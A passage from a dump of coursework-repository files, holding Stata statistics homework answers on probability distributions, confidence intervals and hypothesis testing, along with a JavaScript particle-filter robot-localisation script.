**0.37321143**\n\n* * *\n\n##### Q5. What is the probability that you observe no lung cancer cases in the first year? #####\n\n>\tP(X=0)= ?\n\n>\tk=0\n>\tn=2000\n>\tp=0.00065\n\n>\tP(X=0)= binomialp(2000,0,0.00065)\n\n\tdi binomialp(2000,0,0.00065)\n\n>\t=> **0.27241662**\n\n###### Table in Stata ######\n\n\tclear all\n\tset obs 5\n\tgen x=_n-1\n\tgen p = binomialp(2000,x,0.00065)\n\tlist x p\n\n> x | p\n> ------------- | -------------\n> 0 | 0.2724166\n> 1 | 0.354372\n> 2 | 0.2303763\n> 3 | 0.0997948\n> 4 | 0.0324057\n\n\n\n" }, { "alpha_fraction": 0.5591859817504883, "alphanum_fraction": 0.5710570812225342, "avg_line_length": 29.71180534362793, "blob_id": "578138bcfad55d630f1ccd6db7c23eec677d555b", "content_id": "f9ada3e7c0d03ef9ece1864fbc088f5a14007e53", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 8845, "license_type": "no_license", "max_line_length": 99, "num_lines": 288, "path": "/AI-Class/Algorithms-JS/ParticleFilter/js/map_filter.js", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "/* depends on particlefilter.js being loaded first */\n\n// modified from makeClass - By John Resig (MIT Licensed)\nfunction makeClass(){\n return function(args){\n if ( this instanceof arguments.callee ) {\n if ( typeof this.init == \"function\" )\n this.init.apply( this, args.callee ? args : arguments );\n } else\n throw \"You must instantiate this class with 'new <classname>()', not '<classname>()'\";\n };\n}\n\nMapFilter = (function() {\n\nMapFilter = makeClass();\n\nvar that;\n\nMapFilter.prototype.init = function(map, nparticles, p_random_measurement) {\n this.map = this.arraymap(map);\n\n this.nrows = this.map.length;\n this.ncols = this.map[0].length;\n\n //depends on nrows and ncols\n this.particles = this.makeparticles(nparticles);\n\n //a float 0 < n < 1 representing the probability of returning a random measurement\n this.p_random_measurement = p_random_measurement || .1;\n\n\n //now run the particle filter given the initial measurement we've made\n that = this;\n\n try {\n var botloc = this.findbot(this.map);\n } catch (err) {\n //there's no bot in the maze, just return the mapfilter without sensing\n //or updating the particles\n return;\n }\n\n //save the most recent measurement\n this.last_measurement = this.sense(botloc);\n \n //and the actual state\n this.actual_measurement = this.omniscent_sense(botloc);\n\n this.particles = ParticleFilter(this.particles,\n moveparticle,\n \"none\",\n this.newweight,\n this.last_measurement);\n};\n\n//turn a map from a string into an array\nMapFilter.prototype.arraymap = function(maps) {\n var maplines = maps.split(\"\\n\");\n var map = [];\n\n for (var i=0; i < maplines.length; i++) {\n map.push(maplines[i].split(\"\"));\n }\n\n return map;\n};\n\nMapFilter.prototype.makeparticles = function(n) {\n var particles = [];\n var weights = [];\n var x = 0;\n var y = 0;\n\n for (var i=0; i < n; i++) {\n row = Math.floor(Math.random() * this.nrows);\n col = Math.floor(Math.random() * this.ncols);\n while (this.map[row][col] != \"_\" && this.map[row][col] != 'o') {\n row = Math.floor(Math.random() * this.nrows);\n col = Math.floor(Math.random() * this.ncols);\n }\n particles.push([row, col]);\n weights.push(1/n);\n }\n\n return [particles, weights];\n};\n\nMapFilter.prototype.findbot = function() {\n for (var i=0; i < this.map.length; i++) {\n for (var j=0; j < this.map[0].length; j++) {\n if (this.map[i][j] == \"o\") {\n return [i,j];\n }\n }\n }\n\n throw \"no bot found\";\n};\n\nMapFilter.prototype.getmove = function(direction) {\n //this is a special move, only called so that we can update the particle\n //filter at the initial sense of the robot\n if (direction === \"none\") { return \"none\"; }\n\n var move = Math.random();\n var moves = {\n \"up\": [\"left\", \"right\"],\n \"left\": [\"up\", \"down\"],\n \"down\": [\"right\", \"left\"],\n \"right\": [\"down\", \"up\"]\n };\n\n //80% chance bot moves where you want. Otherwise, you fail by 90 degrees\n if (move > .8) {\n direction = moves[direction][move > .9 ? 0 : 1];\n }\n\n return direction;\n};\n\nMapFilter.prototype.movebot = function(direction) {\n var move = this.getmove(direction);\n\n var botloc = this.findbot(this.map);\n var row = botloc[0];\n var col = botloc[1];\n\n console.log(\"moving bot: \" + move);\n\n if (move == \"up\") { botloc = this.movecoords(row, col, row-1, col); }\n if (move == \"left\") { botloc = this.movecoords(row, col, row, col-1); }\n if (move == \"down\") { botloc = this.movecoords(row, col, row+1, col); }\n if (move == \"right\") { botloc = this.movecoords(row, col, row, col+1); }\n\n if (botloc[0] != row || botloc[1] != col) {\n this.map[row][col] = '_';\n this.map[botloc[0]][botloc[1]] = 'o';\n }\n\n //our bot can sense if there is a wall to the north, south, east or west\n var measurement = this.sense(botloc);\n\n //save the bot + correct measurement so we can display it from the UI\n this.last_measurement = measurement;\n this.actual_measurement = this.omniscent_sense(botloc);\n\n console.log(\"mesaurement: \"+ measurement);\n\n this.particles = ParticleFilter(this.particles,\n moveparticle,\n direction,\n this.newweight,\n measurement);\n};\n\nMapFilter.prototype.omniscent_sense = function(botloc) {\n var row = botloc[0];\n var col = botloc[1];\n\n //an array of 4 integers. 1 represents a wall, 0 represents no wall.\n //ordered north, west, south, east.\n return [\n this.omniscent_iswall(row-1, col),\n this.omniscent_iswall(row, col-1),\n this.omniscent_iswall(row+1, col),\n this.omniscent_iswall(row, col+1)\n ];\n};\n\nMapFilter.prototype.omniscent_iswall = function(row, col) {\n //otherwise, return 1 if [row, col] is a wall\n if (row < 0 || row > this.nrows-1 ||\n col < 0 || col > this.ncols-1 ||\n this.map[row][col] == 'X') {\n return 1;\n }\n return 0;\n}\n\nMapFilter.prototype.sense = function(botloc) {\n var row = botloc[0];\n var col = botloc[1];\n\n //an array of 4 integers. 1 represents a wall, 0 represents no wall.\n //ordered north, west, south, east.\n return [\n this.iswall(row-1, col),\n this.iswall(row, col-1),\n this.iswall(row+1, col),\n this.iswall(row, col+1)\n ];\n};\n\nMapFilter.prototype.iswall = function(row, col) {\n var r = Math.random();\n \n //p_random_measurement% of the time, return a random measurement\n if (r < this.p_random_measurement) {\n return Math.floor(r*100) % 2;\n }\n\n //otherwise, return 1 if [row, col] is a wall\n if (row < 0 || row > this.nrows-1 ||\n col < 0 || col > this.ncols-1 ||\n this.map[row][col] == 'X') {\n return 1;\n }\n return 0;\n};\n\n//try to move from [row, col] to [newrow, newcol]. If [newrow, newcol] is not a\n//valid square, return [row, col]\nMapFilter.prototype.movecoords = function(row, col, newrow, newcol) {\n if (newrow < 0 || newrow > this.nrows-1 ||\n newcol < 0 || newcol > this.ncols-1 ||\n this.map[newrow][newcol] == 'X') {\n return [row, col];\n }\n return [newrow, newcol];\n};\n\n\nMapFilter.prototype.find_walls = function(row, col) {\n var walls = [];\n\n walls.push(row > 0 && this.map[row-1][col] != 'X' ? 0 : 1);\n walls.push(col > 0 && this.map[row][col-1] != 'X' ? 0 : 1);\n walls.push(row < this.nrows-1 && this.map[row+1][col] != 'X' ? 0 : 1);\n walls.push(col < this.ncols-1 && this.map[row][col+1] != 'X' ? 0 : 1);\n\n return walls;\n};\n\nvar moveparticle = function(particle, direction) {\n var row = particle[0];\n var col = particle[1];\n\n var move = that.getmove(direction);\n\n if (move == \"up\") { return that.movecoords(row, col, row-1, col); }\n if (move == \"left\") { return that.movecoords(row, col, row, col-1); }\n if (move == \"down\") { return that.movecoords(row, col, row+1, col); }\n if (move == \"right\") { return that.movecoords(row, col, row, col+1); }\n if (move == \"none\") { return [row, col]; }\n\n throw \"we should never get here: <\" + move + \">\";\n};\n\n\n//Given the particle, return the likelihood of the given measurement\nMapFilter.prototype.newweight = function(particle, measurement) {\n var row = particle[0];\n var col = particle[1];\n\n var p_random = that.p_random_measurement;\n\n //P(wall measurement|wall) = P(~random) + P(random)/2\n //= the probability of a correct measurement plus the probability of a\n //randomly correct measurement\n var p_wallm_wall = (1 - p_random) + (p_random / 2);\n\n //P(wall measurement|no wall) = P(random)/2\n //= the probability of a randomly incorrect measurement\n var p_wallm_nowall = p_random / 2;\n\n var probabilities = [];\n\n var walls = that.find_walls(row, col);\n\n for (var i=0; i < measurement.length; i++) {\n //if we measured wall\n if (measurement[i] == 1) {\n //push P(wall measurement|wall) if it is a wall, its complement otherwise\n probabilities.push(walls[i] == 1 ? p_wallm_wall : 1-p_wallm_wall);\n } else {\n //push P(wall measurement|no wall) if it is a wall, its complement otherwise\n probabilities.push(walls[i] == 1 ? p_wallm_nowall : 1-p_wallm_nowall);\n }\n }\n\n //return the product; the probabilities are all conditionally independent.\n return probabilities.reduce(function(a,b) { return a*b; });\n};\n\nreturn MapFilter;\n\n})();\n" }, { "alpha_fraction": 0.47362688183784485, "alphanum_fraction": 0.5766682028770447, "avg_line_length": 29.935392379760742, "blob_id": "97f25432766f6b74fe10082f0d819cc8317a0dae", "content_id": "739380da5c60b666b9f62ba2a1b52dbccf31efe7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 11060, "license_type": "no_license", "max_line_length": 278, "num_lines": 356, "path": "/PH207x/stata/commands.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Commands in Stata\n\n## Distribution - Binomial, Poisson and Normal\n\n### Suppose X ~ Binomial(n,p) \n> binomialp(n,k,p) - returns the probability of observing k successess - P(X=k) \n> binomial(n,k,p) - returns the probability of observing k or fewer successes - P(X<=k) \n> binomialtail(n,k,p) - return the probability of observing floor(k) or more successes - P(X>=k)\n\n### Suppose X ∼ Poisson(m) \n> poissonp(m,k) - returns the probability of observing floor(k) or fewer successes - P(X=k) \n> poisson(m,k) - returns the probability of observing floor(k) or fewer successes - P(X<=k) \n> poissontail(m,k) - returns the probability of observing floor(k) or more successes - P(X>=k)\n\n### Suppose Z ~ Normal(0,1) \n> normal(z) - return the cumulative standard normal distribution - P( Z<z ) \n> normalden(z) - returns the standard normal density\n\n### Distribution Table in Stata\n\n\tclear all\n\tset obs 5\n\tgen k=_n-1\n\tgen p = binomialp(2000,k,0.00065)\n\tlist k p\n\n\n x | p \n---|-----------\n 0 | .2724166\n 1 | .354372\n 2 | .2303763\n 3 | .0997948\n 4 | .0324057\n\n\n## Sampling Distribution\n\n\tset seed 7234234234\n\tsample 49, count\n\n\tuse \"framingham_dataset.dta\"\n\tsumm death angina totchol1 sysbp1 diabp1 bmi1 glucose1\n\n### Central Limit Theorem\n\n#### First Sample Set ####\n\n\tsum bmi1\n\tdrop if bmi1 == .\n\tkeep bmi1\n\tpreserve\n\tsample 20, count\n\tsummarize\n\n#### Second Sample Set ####\n\n\t. restore\n\t. preserve\n\tsample 20, count\n\tsum bmi1\n\n#### Third Sample Set ####\n\n\t. restore\n\t. preserve\n\tsample 100, count\n\tsum bmi1\n\n#### Fourth Sample Set - Check again ####\n\n\t. restore\n\t. preserve\n\tsample 100, count\n\tsum bmi1\n\n#### Compare Histograms (Continued vs. Binary) ####\n\n\tuse \"framingham_dataset.dta\"\n\t. histogram bmi1\n\t. histogram prevmi1\n\n\n## Confidence and Predictive Intervals\n\n### Example: BMI in Framingham\nX~Normal(μ, σ²)\n\n##### Q1. Construct a 95% predictive interval for X #####\n\t \n\n>\tsum bmi1\n\n Variable | Obs | Mean | Std. Dev. | Min | Max\n-------------|------------|------------|-------------|-----------|---------\n bmi1 | 4415 | 25.84616 | 4.101821 | 15.54 | 56.8\n\n> [ x⁻-1.96*σ/SQRT(n), x⁻+1.96*σ/SQRT(n), ] \n>\tdi 25.84616 \n> 25.84616\n\n>\tdi 25.84616 - 1.96*4.101821 \n>\tdi 25.84616 + 1.96*4.101821\n> [17.806591, 33.885729 ]\n\n##### Q2. Suppose we now draw repeated samples of size 100 from the Framingham cohort. What is a 95% predictive interval for the sample mean? #####\n\t \n>\tdi 25.84616 - 1.96*4.101821/sqrt(100)\n>\tdi 25.84616 + 1.96*4.101821/sqrt(100)\n> [ 25.042203, 26.650117 ]\n\n##### Q3. Take a sample of size 100. Construct a 95% configence interval for μ. #####\n\t \n>\tsample 100, count\n>\tsum bmi1\n\n>\tdi 25.84616 + 1.96*4.101821/sqrt(100)\n>\tdi 25.84616 - 1.96*4.101821/sqrt(100)\n> [ 25.042203, 26.650117 ]\n\n## Confidence intervals and t-distribution\n> X~Normal(μ, σ²) \n> CI= Confidence Interval\n\n### σ is known ###\n> 95% x⁻ +- Z_(1-2/2) * σ/sqrt(n)\n> Z= 0.975\n\n### σ is unknown ###\n> 95% CI x⁻ +- t_n-1,0.975 * σ/sqrt(n)\n\n> Note that if \"normal(z)=p\", then \"invnormal(p)=z\"\n\n\tset seed 2 \n\tsample 20, count \n\tsum bmi1\n\n\n> Variable | Obs | Mean | Std. Dev. | Min | Max\n> -------------|-------------|-----------|-------------|----------|---------\n> bmi1 | 20 | 25.0295 | 3.184407 | 20.19 | 32.29\n\n> *95%:* \n>\tdi 25.0295 - 1.96*3.184407 \n>\tdi 25.0295 + 1.96*3.184407 \n> => **[ 18.788062, 31.270938 ]**\n\n> *Z= 0.975* \n>\tdi 25.0295 - invnormal(0.975)*3.184407 \n>\tdi 25.0295 + invnormal(0.975)*3.184407 \n> => **[ 18.788177, 31.270823 ]**\n\n> *99%:* \n>\tdi 25.0295 - invnormal(0.995)*3.184407 \n>\tdi 25.0295 + invnormal(0.995)*3.184407 \n> => **[ 16.827011, 33.231989 ]**\n\n\n### 95% confidence interval for μ where σ is known###\n> σ is known and it is σ= 4.1 for the framingham cohort\n> invnormal(0.975) ~ 1.96\n\n\n\tset seed 2\n\tsample 20, count\n\tsum bmi1\n\n> Variable | Obs | Mean | Std. Dev. | Min | Max\n> -------------|-------------|-----------|-------------|----------|---------\n> bmi1 | 20 | 25.0295 | 3.184407 | 20.19 | 32.29\n\n\n>\tdi 25.029-1.96*4.1/sqrt(20) \n>\tdi 25.029+1.96*4.1/sqrt(20) \n> => **[23.232096, 26.825904]**\n\n> *97.5%:*\n>\tdi 25.029-invnormal(0.975)*4.1/sqrt(20) \n>\tdi 25.029+invnormal(0.975)*4.1/sqrt(20) \n> => **[23.232129, 26.825871]**\n\n\n### 95% for μ with invttail where σ is unknown ###\n> σ is unknown \n> x⁻ +- t_n-1 * σ/sqrt(n) \n> t-tail= 0.025 \n> n-1= 19 \n> \n>\tdi 25.029-invttail(19,0.025)*3.184407/sqrt(20) \n>\tdi 25.029+invttail(19,0.025)*3.184407/sqrt(20) \n> => **[ 23.538652, 26.519348 ]**\n\n#### Easy Stata command to calculate invttail where σ is unknown ####\n\n\tset seed 2\n\tsample 20, count\n\tsum bmi1\n\n> Variable | Obs | Mean | Std. Dev. | Min | Max\n> -------------|-------------|-----------|-------------|----------|---------\n> bmi1 | 20 | 25.0295 | 3.184407 | 20.19 | 32.29\n\n\n\tcii 20 25.0295 3.184407\n\n\n> Variable | Obs | Mean | Std. Err. | min [95% Conf. Interval] | max [95% Conf. Interval] \n> ------------|-------------|-----------|--------------|------------------------------|--------------------------\n> | 20 | 25.0295 | .7120551 | 23.53915 | 26.51985 \n\n\n#### Easy Stata command to calculate confidence intervals ####\n\n\tci bmi1\n\n> Variable | Obs | Mean | Std. Err. | min [95% Conf. Interval] | max [95% Conf. Interval] \n> ------------|-------------|-----------|--------------|------------------------------|--------------------------\n> bmi1 | 20 | 25.0295 | .712055 | 23.53915 | 26.51985 \n\n## P-values and examples ##\n> μ_0= 237 mg/ml \n> σ= 47.7 mg/100ml \n> n= 49 non-hypertensives \n> z= (x⁻ - μ_0) / (σ/SQRT(n))\n\n\tset seed 725764662\n\tdrop if hyperten==1\n\tsample 49, count\n\tmean totchol1\n\n> We could use the standard error (Std. Err.), if we are using t instead of z. Now we are using z!\n\n> | Mean | Std. Err. | min [95% Conf. Interval] | max [95% Conf. Interval]\n> -------------|------------- | ---------- | ------------------------- | -------------------------\n> totchol1 | 221.8776 | 4.614348 | 212.5998 | 231.1553\n> Mean estimation Number of obs = 49\n\n\tdi (221.8776-237) / (44.7/7)\n> => -2.3681611\n\n## Hypothesis Testing ##\n\n### Example: Inference about heart rates in healthy young adults ###\n> In adults over 15 years of age, a resting heart rate around 80bpm is usually considered average. Using a subset of the Framingham cohort, we are going to attempt to make inference about heart rate among \"healthy young\" adults.\"\n\n> Specifically, we restrict our analysis to adults with the following characteristics at baseline: non-smoker, younger than 40, BMI less than 25 and systolic blood pressure less than 120. There are 61 participants who meet our criteria.\n\n> **We hypothesize that heart rate at follow up would be lower than 80bpm, the resting heart rate for adults with average health.**\n\n> We are making the somewhat strong assumption that these Framingham participants are generalizable to the broader population of healthy young adults (this assumotion is necessary if we want to make inference about heart rate in healty young adults.)\n\n1. Choose a test (e.g. one-sample t-test)\n\n> Hypotheses | \n> -------------- | \n> H_0: μ = 80 | \n> H_A: μ != 80 | \n\n* One sample t-test\n* Normally distributed\n\n> Stata commands:\n\n\tuse healthyyoungadults.dta\n\thistogram heartrte2\n\thistogram heartrte2 if heartrte2 < 200\n\n\n2. State null or alternative hypothesis\n\n\n3. Do the tests\n\n> Stata commands for \"One-sample t test\":\n\n\tdb ttest\n\tttest heartrte2 == 80\n\n> Variable | Obs | Mean | Std. Err. | Std. Dev. | min [95% Conf. Interval] | max [95% Conf. Interval] \n> -------- | -------- | ---------- | ---------- | ---------- | ------------------------ | -------------------------\n> heartr~2 | 61 | 76.55738 | 2.800032 | 21.86895 | 70.95648 | 82.15827\n\n> mean = mean(heartrte2) t = -1.2295 \n> Ho: mean = 80 degrees of freedom = 60 \n> Ha: mean < 80 Ha: mean != 80 Ha: mean > 80 \n> Pr(T < t) = 0.1118 Pr(|T| > |t|) = 0.2237 Pr(T > t) = 0.8882\n\n4. Present your results - test statistic, p-valu..\n \n> => test statistic= t= -1.2295 \n> => degrees of freedom = 60 \n \n> Under the null hypothesis, this test statistic follows a t-distribution with 60 degrees of freedom. Given that null distribution we can say that my p-value is \n> => Pr(|T| > |t|) = **0.2237** \n \n5. Conclusion reject the null or fail to reject the null\n\n> Given that my p-value is **0.2237** and I know that p is greater than 0.05, I'm going to fail to reject. \n> => **fail to reject the null hypothesis**\n\n6. Make a conclusion about your data\n\n> => We do not have any evidence in data to sugeest that the heart rate is different from 80 in healthy young adults at follow-up. \n> => So we don't see any evidence for the alternative hypothesis in our data set\n\n\n### Hypothesis Testing ###\n> Click on the link above to obtain a subsample of the BMI at baseline among 20 Framingham participants in the dataset subset.dta. Assume that BMI at baseline is normally distributed, but the variance of BMI at baseline is unknown.\n\n1. Construct a 90% confidence interval for BMI at baseline among Framingham participants using the subsample.\n\n> 90% is 1.64 for a normal distribution\n\n\tsum bmi1\n\tdi 26.3335 - 1.64*3.99473\n\tdi 26.3335 + 1.64*3.99473\n=> **[19.782143, 32.884857]**\n\n\n2. Using the confidence interval in question 1 above, would you reject the null hypothesis that BMI among participants with diabetes is equal to 27 (versus the alternative that BMI is not equal to 27) at the 90% confidence level? (Hint: does the confidence interval contain 27?)\n\n> Hypotheses | \n> -------------- | \n> H_0: μ = 27 | \n> H_A: μ != 27 | \n\n> => **Yes** \n> No \n\n\n3. For normally distributed random variables with known variance, the width of the 90% predictive interval for the sample mean is equal to the width of a 90% confidence interval for the population mean.\n\n> True \n> => **False** \n\n\n4. For the test described in question 2 above, what is:\n\n\tttest bmi1 = 27, level(90)\n\n> => the value of test statistic: **-0.7462** \n> => the distribution of the test statistic under the null hypothesis: t-distribution with 19 degrees of freedom \n> => the p-value: **0.4647**\n\n\n5. Using the confidence interval above, we conclude that BMI at baseline in the Framingham cohort is not different from 27 at the α=0.1 level of significance. \n> => Yes, we fail to reject the null hypothesis\n\n> True \n> => **False**\n\n\n6. If an outlier is disproportionately influencing your hypothesis test, you should always throw it out. \n\n> True \n> => **False**\n\n\n" }, { "alpha_fraction": 0.7755835056304932, "alphanum_fraction": 0.7917414903640747, "avg_line_length": 110.19999694824219, "blob_id": "daaa349fd79cab6c79bac1689eaabf4a9678d6e4", "content_id": "6942017ab4d137cd7ab0881326cbc76c7743aded", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 557, "license_type": "no_license", "max_line_length": 442, "num_lines": 5, "path": "/PH207x/homework/ten/Confounding and Effect Modification.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Confounding and Effect Modification #\nDr. Smith conducts a randomized clinical trial to determine if aspirin reduces the risk of heart attack. Fifty percent of male patients are exposed and fifty percent of female patients are exposed. He finds an incidence rate ratio (IRR) of 0.75 comparing people who were assigned to take aspirin to those assigned to placebo. Among men, he finds that those assigned to take aspirin have an IRR=0.60 but among women, the IRR=0.95. Is gender a:\n* Confounder \n* Effect modifier \n* Both a confounder and effect modifier \n" }, { "alpha_fraction": 0.6116182804107666, "alphanum_fraction": 0.6937759518623352, "avg_line_length": 36.0461540222168, "blob_id": "ea40842fc7ced6ca28f42475d2d690db9aae1d21", "content_id": "28a9d405e7b072c4f40f56751e2aa38355e77548", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2425, "license_type": "no_license", "max_line_length": 513, "num_lines": 65, "path": "/PH207x/homework/six/Confidence intervals and testing with unknown variance.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "#Confidence intervals and testing with unknown variance#\nSuppose now that we are interested in the distribution of hemoglobin levels in Mumbai. We decide that it is unreasonable to extrapolate the Delhi results to Mumbai, and therefore the population standard deviation is unknown. We take a random sample of 15 children in Mumbai. The sample mean is xˉ=115 g/L, with sample standard deviation s=10.2 g/L. Assume hemoglobin levels in Mumbai are normally distributed (we could check this by looking at the distribution of hemoglobin levels in other similar populations). \n\n> n= 15 \n> xˉ= sample mean= 115 g/L\n> s= sample standard deviation= 10.2 g/L\n\n\n1. Construct a two-sided 95% confidence interval for μ.\n> t_15-1,0.995= 1.96 \n> x⁻ +- t_15-1,0.9955 * s/SQRT(n)= 115 +- 1.96*10.2/sqrt(15)\n\n\tdi 115+1.96*10.2/sqrt(15)\n\tdi 115-1.96*10.2/sqrt(15)\n> => **[ 109.83809, 120.16191 ]**\n\n> test: cii 15 115 10.2, level(95)\n\n\n2. Use the confidence interval in question 1 above to answer the following questions:\n\n* Would you reject the null hypothesis that the mean hemoglobin level is equal to 108 g/L, versus the alternative that the mean is not equal to 108 g/L, at the **α=0.05** level?\n\n> μ_0= 108 \n> Reject if Z is > 1.96 or < -1.96, then Pr(reject H_0 when true) = α = 0.05\n> z= (x⁻ - μ_0) / (s/SQRT(n))= (115 - 108) / (10.2/sqrt(15))= **2.6579297**\n\n> z > 1.96\n\n> => **yes** \n> no \n> not enough information \n\n\n* Would you reject the null hypothesis that the mean hemoglobin level is equal to 108 g/L, versus the alternative that the mean is not equal to 108 g/L, at the **α=0.01** level?\n\n> yes \n> no \n> => **not enough information**\n\n\n* Would you reject the null hypothesis that the mean hemoglobin level is equal to 108 g/L, versus the alternative that the mean is not equal to 108 g/L, at the **α=0.1** level?\n\n> => **yes** \n> no \n> not enough information \n\n\n3. Conduct a one-sample t-test to test the null hypothesis that the mean hemoglobin level is equal to 108 g/L, versus the alternative that the mean is not equal to 108 g/L, at the α=0.01 level.\n> μ_0= 108 \n\n\tttesti 15 115 10.2 108\n\n\n* What is your test statistic? \n> => **t = 2.6579**\n\n* Under the null hypothesis, the test statistic follows a t-distribution with how many degrees of freedom? \n> => **degrees of freedom = 14**\n\n* What is your p-value?\n> => **0.0187**\n\n* What do you conclude?\n> => **fail to reject the null hypothesis**\n\n\n" }, { "alpha_fraction": 0.5645756721496582, "alphanum_fraction": 0.6735994815826416, "avg_line_length": 36.224998474121094, "blob_id": "1f2403cb479c8f94b0f1fed9f95eb13ab8a63074", "content_id": "c72c852e17ce81ed125510f1faea7eb33583da9d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2981, "license_type": "no_license", "max_line_length": 272, "num_lines": 80, "path": "/PH207x/homework/four/Lung cancer and the Poisson distribution.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Lung cancer and the Poisson distribution\nRecall: According to data from the CDC in 2010, 19.3% of adults age eighteen and older smoke cigarettes. In the year 2008, the incidence rate of lung cancer was 65.1 cases per 100,000 people per year.\n\nSuppose you are conducting a lung cancer study in the United States, and you obtain a random sample of 2,000 adults (over 18 years of age) who do not have lung cancer. You plan to follow this study cohort over a period of 5 years and observe incident cases of lung cancer.\n\nLung cancer and the Poisson distribution. Because lung cancer is a rare disease, we can model cases of lung cancer using the Poisson distribution, with incidence rate 65.1 cases per 100,000 person-years.\n\n**Q1: Using the Poisson distribution, what is the probability that you observe more than 1 lung cancer case in the first year?** *Hint1: Please see that it is more than 1 lung cancer. 1 is not included.* \n>\tP(X>1)= ? \n>\t \n>\tk=1 \n>\tn=2000 \n>\tp=0.00065 \n>\tm= mean= n*P= 2000*0.000651= 1.302 \n>\tP(X>1)= P(X>=1)-P(X=1)= poissontail(m,k) - poissonp(m,k) \n\n\tdi poissontail(1.302,1) - poissonp(1.302,1)\n\n>\t=> **0.37388529**\n\n\n**Q2: What is the expected number of lung cancer cases observed over the five year study period?** \n*Hint1: It is 5 year study period. Same number of Cancer will be produced each year.* \n*Hint2: In a year how many cancer cases will be observed among the 2000 randomly selected individuals?* \n>\tincidence_rate= 0.000651 \n>\t \n>\tduration= 5 \n>\tprevalence = incidence_rate * duration= 0.000651 * 5= 0.003255 \n>\tE(x)= n*p= 0.003255*2000= **6.51**\n\n**Q3: What is the variance of the number of lung cancer cases observed over the five year study period?** \n*Hint1: In the formula for variance which is np(1-p) if p is too tiny tiny tiny what will (1-p)equal to and ultimately np(1-p)=???. It was already indicated that lamda = mean = np.* \n\t \n>\tn=2000 \n>\tp=0.00065 \n>\tvariance= np(1-p)= 2000*0.00325*(1-0.00325)= **6.478875**\n\n\n**Q4: What is the probability that you observe more than 10 lung cancer cases over the five year period?** \n*Hint1: It is more than 10. 10 is not included. 5 years period. In stata, di poisson(mean,X) gives result inclusive of X.* \n\t \n>\tk=10 \n>\tn=2000 \n>\tp=0.00065 \n>\tm= mean= n*P= 2000*0.000651= 1.302\n>\t \n>\tP(X>10)= ? \n>\tP(X>10)= P(X>=10)-P(X=10)= poissontail(1.302,10)-poissonp(1.302,10) \n\n\tdi poissontail(1.302,10)-poissonp(1.302,10)\n\n>\t=> 1.392e-07\n\n\tclear all\n\tset obs 11\n\tgen k=10\n\tgen m=_n*2000*0.000651\n\tgen p = poissontail(m,k)-poissonp(m,k)\n\tlist m p\n\n>\t=> **0.0673981**\n\n\n**Q5: What is the probability that you observe less than 5 lung cancer cases over the five year period?** \n\t \n>\tk=5 \n>\tn=2000 \n>\tp=0.00065 \n>\tm= mean= n*P= 2000*0.000651= 1.302 \n>\t \n>\tP( X<5 )= P(X<=k)-P(X=k)= poisson(m,k) - poissonp(m,k) \n\n\tclear all\n\tset obs 11\n\tgen k=5\n\tgen m=_n*2000*65.1/100000\n\tgen p = poisson(m,k) - poissonp(m,k)\n\tlist m p\n\n>\t=> **0.2225557**\n\n\n\n" }, { "alpha_fraction": 0.737393319606781, "alphanum_fraction": 0.7715283036231995, "avg_line_length": 57.59090805053711, "blob_id": "825a9ce36d1350e255e3f1cb7fa8830f7e0482e2", "content_id": "29491638328946478861160a3c70d03b6a8dc8a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2582, "license_type": "no_license", "max_line_length": 430, "num_lines": 44, "path": "/PH207x/homework/ten/Multiple Linear Regressio.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Multiple Linear Regression #\nAgain, we model the amount of nickel found in the sediment. Now, we model nickel as a function of both time (month) and location (longitude). The Gulf Coast in Louisiana is somewhat horizontal, so for simplicity we will ignore longitude in this problem. \n \nFit a linear regression model with nickel as the outcome and with month and longitude as explanatory covariates. Model month as a continuous variable, as in Model 2 from the previous question. Call this Model 3. Assume the assumptions of linear regression hold. \n \nhttps://maps.google.com/maps/ms?msid=205190672353608758732.0004d1dab620c7540a566&msa=0&ll=29.544788,-91.384277&spn=4.758846,7.613525 \n \n \n**TODO:**\n* Fit a linear regression model with nickel as the outcome and with month and longitude as explanatory covariates\n\n```stata\n\tregress nickel month longitude\n\tregress nickel longitude\n\ttwoway (scatter nickel longitude)\n```\n\n##### 1. Compare the adjusted R-squared from Models 2 and 3. Does the addition of longitude improve the adjusted R-square? #####\n* Yes\n* No \n\n##### 2. Test whether the coefficient for longitude in the model is equal to 0 at the 0.05 level of significance. #####\n\n1. What is the estimated coefficient? \n\n2. The estimated standard error of the estimated coefficient?\n\n3. The estimate of the test statistic?\n\n4. The number of degrees of freedom of the distribution of the test statistic under the null hypothesis? \n> **Hint1:** n-k-1: n is the sample size k is the number of variables 1 is 1, obviously\n\n5. The p-value?\n\n6. Your conclusion?\n\t- We have no evidence that, for a given month, average nickel levels have a linear relationship with longitude. \n\t- We have evidence that, for a given month, average nickel levels have a linear relationship with longitude. \n\n\n##### 3. For each month, make a scatter plot with longitude on the x-axis and nickel on the y-axis to assess the linearity assumption. Conditional on month, does the relationship between nickel and longitude appear to be linear? (Hint: try the example problems in the lecture sequence to help with constructing the scatter plot.) #####\n* Yes\n* No \n\nIn this example, our regression results show that we cannot assume a linear relationship between nickel levels and longitude, conditional on month. Incorporating location into statistical models is a whole genre of what is conveniently called spatial statistics. It is well beyond the scope of this course, but this is a brief introduction into “thinking spatially”. We need a more flexible model to reflect spatial heterogeneity.\n" }, { "alpha_fraction": 0.6849315166473389, "alphanum_fraction": 0.7323824167251587, "avg_line_length": 58.98305130004883, "blob_id": "b4a7b622fac75405958f2e32b41927c6552fe105", "content_id": "08774f414ab5bde87437420b415c6a2cc6028ef3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7081, "license_type": "no_license", "max_line_length": 451, "num_lines": 118, "path": "/PH207x/homework/eight/Survey 